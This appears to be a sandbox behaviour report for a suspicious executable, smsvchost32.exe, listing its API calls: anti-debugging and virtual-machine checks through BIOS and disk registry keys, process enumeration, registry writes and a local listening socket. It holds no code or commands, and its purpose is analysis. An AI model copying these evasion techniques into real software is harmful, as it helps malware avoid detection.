| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWinEventHook, address_out = 0x7782fc00 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| System | Get Info | type = Hardware Information |
|
2 | |
| Module | Load | module_name = ADVAPI32.DLL, base_address = 0x74aa0000 |
|
1 | |
| Module | Load | module_name = KERNEL32.DLL, base_address = 0x765a0000 |
|
1 | |
| Module | Load | module_name = NETAPI32.DLL, base_address = 0x77490000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetStatisticsGet, address_out = 0x77492a40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetApiBufferFree, address_out = 0x6ff916d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x74ac0590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74ac10a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74ac0650 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Address | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, function = _OPENSSL_isservice, address_out = 0x0 |
|
1 | |
| Module | Load | module_name = USER32.DLL, base_address = 0x77810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x77848cb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorInfo, address_out = 0x7784c160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetQueueStatus, address_out = 0x7782e1b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x765c7b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseToolhelp32Snapshot, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Heap32First, address_out = 0x765e3f00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Heap32Next, address_out = 0x765e4270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Heap32ListFirst, address_out = 0x765e4120 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Heap32ListNext, address_out = 0x765e41d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32First, address_out = 0x765bf4d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32Next, address_out = 0x765bd1c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Thread32First, address_out = 0x765c5c50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Thread32Next, address_out = 0x765c5150 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Module32First, address_out = 0x765e44b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Module32Next, address_out = 0x765e4660 |
|
1 | |
| System | Get Time | type = Ticks, time = 178953 |
|
1 | |
| System | Get Time | type = Ticks, time = 178968 |
|
5 | |
| System | Get Time | type = Ticks, time = 178984 |
|
2 | |
| System | Get Time | type = Ticks, time = 179015 |
|
1 | |
| System | Get Time | type = Ticks, time = 179046 |
|
3 | |
| System | Get Time | type = Ticks, time = 179062 |
|
3 | |
| System | Get Time | type = Ticks, time = 179078 |
|
2 | |
| System | Get Time | type = Ticks, time = 179109 |
|
4 | |
| System | Get Time | type = Ticks, time = 179125 |
|
3 | |
| System | Get Time | type = Ticks, time = 179140 |
|
2 | |
| System | Get Time | type = Ticks, time = 179171 |
|
1 | |
| System | Get Time | type = Ticks, time = 179187 |
|
2 | |
| System | Get Time | type = Ticks, time = 179203 |
|
4 | |
| System | Get Time | type = Ticks, time = 179218 |
|
2 | |
| System | Get Time | type = Ticks, time = 179250 |
|
1 | |
| System | Get Time | type = Ticks, time = 179265 |
|
4 | |
| System | Get Time | type = Ticks, time = 179281 |
|
3 | |
| System | Get Time | type = Ticks, time = 179312 |
|
3 | |
| System | Get Time | type = Ticks, time = 179328 |
|
4 | |
| System | Get Time | type = Ticks, time = 179343 |
|
2 | |
| System | Get Time | type = Ticks, time = 179375 |
|
4 | |
| System | Get Time | type = Ticks, time = 179390 |
|
4 | |
| System | Get Time | type = Ticks, time = 179406 |
|
1 | |
| System | Get Time | type = Ticks, time = 179437 |
|
4 | |
| System | Get Time | type = Ticks, time = 179453 |
|
4 | |
| System | Get Time | type = Ticks, time = 179468 |
|
1 | |
| System | Get Time | type = Ticks, time = 179484 |
|
1 | |
| System | Get Time | type = Ticks, time = 179500 |
|
2 | |
| System | Get Time | type = Ticks, time = 179515 |
|
3 | |
| System | Get Time | type = Ticks, time = 179531 |
|
3 | |
| System | Get Time | type = Ticks, time = 179562 |
|
3 | |
| System | Get Time | type = Ticks, time = 179578 |
|
3 | |
| System | Get Time | type = Ticks, time = 179593 |
|
2 | |
| System | Get Time | type = Ticks, time = 179734 |
|
1 | |
| System | Get Time | type = Ticks, time = 179750 |
|
4 | |
| System | Get Time | type = Ticks, time = 179765 |
|
2 | |
| System | Get Time | type = Ticks, time = 179781 |
|
1 | |
| System | Get Time | type = Ticks, time = 179984 |
|
1 | |
| System | Get Time | type = Ticks, time = 180000 |
|
13 | |
| System | Get Time | type = Ticks, time = 180015 |
|
12 | |
| System | Get Time | type = Ticks, time = 180078 |
|
2 | |
| System | Get Time | type = Ticks, time = 180093 |
|
2 | |
| System | Get Time | type = Ticks, time = 180125 |
|
9 | |
| System | Get Time | type = Ticks, time = 180140 |
|
14 | |
| System | Get Time | type = Ticks, time = 180171 |
|
2 | |
| System | Get Time | type = Ticks, time = 180187 |
|
14 | |
| System | Get Time | type = Ticks, time = 180203 |
|
14 | |
| System | Get Time | type = Ticks, time = 180250 |
|
12 | |
| System | Get Time | type = Ticks, time = 180265 |
|
15 | |
| System | Get Time | type = Ticks, time = 180281 |
|
4 | |
| System | Get Time | type = Ticks, time = 180375 |
|
10 | |
| System | Get Time | type = Ticks, time = 180390 |
|
14 | |
| System | Get Time | type = Ticks, time = 180406 |
|
8 | |
| System | Get Time | type = Ticks, time = 180468 |
|
12 | |
| System | Get Time | type = Ticks, time = 180484 |
|
13 | |
| System | Get Time | type = Ticks, time = 180500 |
|
6 | |
| System | Get Time | type = Ticks, time = 180578 |
|
13 | |
| System | Get Time | type = Ticks, time = 180593 |
|
14 | |
| System | Get Time | type = Ticks, time = 180609 |
|
5 | |
| System | Get Time | type = Ticks, time = 180734 |
|
3 | |
| System | Get Time | type = Ticks, time = 180750 |
|
11 | |
| System | Get Time | type = Ticks, time = 180765 |
|
15 | |
| System | Get Time | type = Ticks, time = 180781 |
|
2 | |
| System | Get Time | type = Ticks, time = 180843 |
|
7 | |
| System | Get Time | type = Ticks, time = 180859 |
|
14 | |
| System | Get Time | type = Ticks, time = 180875 |
|
11 | |
| System | Get Time | type = Ticks, time = 180906 |
|
6 | |
| System | Get Time | type = Ticks, time = 180921 |
|
15 | |
| System | Get Time | type = Ticks, time = 180937 |
|
13 | |
| System | Get Time | type = Ticks, time = 180984 |
|
6 | |
| System | Get Time | type = Ticks, time = 180984 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:02 (UTC) |
|
2 | |
| Module | Get Filename | module_name = WINMM.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 520 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:03 (UTC) |
|
12 | |
| Environment | Get Environment String | name = NODE_CHANNEL_FD |
|
1 | |
| Environment | Get Environment String | name = USERNAME, result_out = Nd9E1FYi |
|
1 | |
| Environment | Get Environment String | name = startupObject |
|
1 | |
| Environment | Get Environment String | name = NODE_HEAPDUMP_OPTIONS |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:03 (UTC) |
|
6 | |
| Environment | Get Environment String | name = NODE_DEBUG |
|
1 | |
| Module | Load | module_name = iphlpapi.dll, base_address = 0x71d30000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\iphlpapi.dll, function = GetNetworkParams, address_out = 0x71d3c4f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersAddresses, address_out = 0x71d35b70 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x74aa0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SystemFunction036, address_out = 0x74682a60 |
|
1 | |
| DNS | Get Hostname | name_out = x2vS1cum |
|
1 | |
| Environment | Get Environment String | name = NODE_DEBUG |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Module | Load | module_name = USER32.DLL, base_address = 0x77810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x778901f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetActiveWindow, address_out = 0x77842840 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetLastActivePopup, address_out = 0x77842260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetUserObjectInformationW, address_out = 0x77848fa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetProcessWindowStation, address_out = 0x77848b10 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Environment | Get Environment String | name = NODE_DEBUG |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:05 (UTC) |
|
6 | |
| Environment | Get Environment String | name = APPDATA, result_out = C:\Users\Nd9E1FYi\AppData\Roaming |
|
1 | |
| Environment | Get Environment String | name = USERPROFILE, result_out = C:\Users\Nd9E1FYi |
|
10 | |
| Environment | Get Environment String | name = APPDATA, result_out = C:\Users\Nd9E1FYi\AppData\Roaming |
|
1 | |
| Environment | Get Environment String | name = NODE_MODULE_CONTEXTS |
|
1 | |
| Environment | Get Environment String | name = USERPROFILE, result_out = C:\Users\Nd9E1FYi |
|
1 | |
| Environment | Get Environment String | name = NODE_PATH |
|
1 | |
| Environment | Get Environment String | name = vendor_id, result_out = exe_scheduler_3007 |
|
1 | |
| Environment | Get Environment String | name = mainprocessoverride, result_out = svchost.exe |
|
2 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:05 (UTC) |
|
6 | |
| System | Get Info | type = Operating System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft, value_name = {7ade5bfc-66f6-4220-aa24-6032bdb90317}, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft, value_name = {102f49a9-80c9-42ee-8924-3256738fc621}, type = REG_NONE |
|
1 | |
| Debug | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, type = DEBUG_STRING, text = JS : RUN : smsvchost32.exe, ver : 25.10.18.1117 |
|
1 | ||
| Environment | Get Environment String | name = dump_debug_to_file |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| DNS | Get Hostname | name_out = x2vS1cum |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ~MHz, data = 172 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1, value_name = ~MHz, data = 172 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2, value_name = ~MHz, data = 172 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3, value_name = ~MHz, data = 172 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = USERNAME_REQUIRED |
|
1 | |
| DNS | Get Hostname | name_out = x2vS1cum |
|
1 | |
| Environment | Get Environment String | name = fakehostname |
|
1 | |
| System | Open Certificate Store | encoding_type = 0, flags = 98304 |
|
1 | |
| Environment | Get Environment String | name = trustedcomp |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Environment | Get Environment String | name = USERDOMAIN, result_out = X2VS1CUM |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System, value_name = SystemBiosVersion, data = 0, type = REG_MULTI_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System, value_name = SystemBiosVersion, data = 39453512, type = REG_MULTI_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\IDE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\IDE |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI |
|
1 | |
| Environment | Get Environment String | name = debug_main |
|
4 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = debug_main |
|
1 | |
| Environment | Get Environment String | name = httpPortOverride |
|
1 | |
| Environment | Get Environment String | name = httpsPortOverride |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft, value_name = {2dc03b67-bbe0-46f6-a506-c0799ccb1f6b}, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft, value_name = {2dc03b67-bbe0-46f6-a506-c0799ccb1f6b}, size = 20, type = REG_BINARY |
|
1 | |
| Environment | Get Environment String | name = debug_main |
|
1 | |
| Environment | Get Environment String | name = http_proxy |
|
1 | |
| Environment | Get Environment String | name = debug_tls |
|
1 | |
| Environment | Get Environment String | name = debug_net |
|
5 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| System | Open Certificate Store | encoding_type = 0, flags = 98304 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:12 (UTC) |
|
1 | |
| Environment | Get Environment String | name = NODE_UNIQUE_ID |
|
1 | |
| Environment | Get Environment String | name = NODE_CLUSTER_SCHED_POLICY |
|
1 | |
| Environment | Get Environment String | name = debug_net |
|
3 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Bind | protocol = IPPROTO_IP, local_address = 127.0.0.1, local_port = 281 |
|
1 | |
| Socket | Listen | local_address = 127.0.0.1, local_port = 281, queue_length = 511 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
